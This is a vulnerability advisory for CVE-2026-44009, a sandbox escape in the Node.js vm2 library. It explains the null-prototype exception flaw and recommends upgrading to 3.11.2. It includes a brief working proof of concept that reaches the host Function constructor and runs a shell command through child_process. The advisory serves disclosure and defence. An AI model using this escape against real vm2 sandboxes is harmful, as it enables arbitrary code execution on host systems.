CVE-2026-44009: vm2: Sandbox Breakout Through Null Proto Exception
Summary
VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system.
Details
In handleException due to // SECURITY (post-GHSA-mpf8 hardening): use from (not ensureThis) exceptions with a null proto will be assumed to come from the other side and being proxied. Therefore, it is possible to get the proxied and unproxied object of a sandbox object with a null proto when thrown and then catched which allows to get the host Function object.
PoC
js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run( const o = {proto: null}; try { throw o; } catch (e) { e.f = Buffer.prototype.inspect o.f.constructor("return process")().mainModule.require('childprocess').execSync('touch pwned'); } ));
Impact
Attackers can perform Remote Code Execution under the assumption that arbitrary code can be executed inside the context of a vm2 sandbox.
Other sources
vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.2, This vulnerability is fixed in 3.11.2.
— MITRE
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
npm/vm2to a version that resolves this vulnerability.Fixed in 3.11.2 - Upgrade
Upgrade
vm2to a version that resolves this vulnerability.Fixed in 3.11.2
Event History
Frequently Asked Questions
What is the severity of CVE-2026-44009?
CVE-2026-44009 is classified as a critical severity vulnerability that allows sandbox breakout.
How do I fix CVE-2026-44009?
To fix CVE-2026-44009, upgrade to vm2 version 3.11.2 or later.
What is the impact of CVE-2026-44009?
The impact of CVE-2026-44009 allows attackers to execute arbitrary commands on the host from the VM2 sandbox.
Which versions of vm2 are affected by CVE-2026-44009?
CVE-2026-44009 affects all versions of vm2 up to 3.11.2.
Can CVE-2026-44009 impact production environments?
Yes, CVE-2026-44009 can significantly impact production environments by allowing unauthorized access to host resources.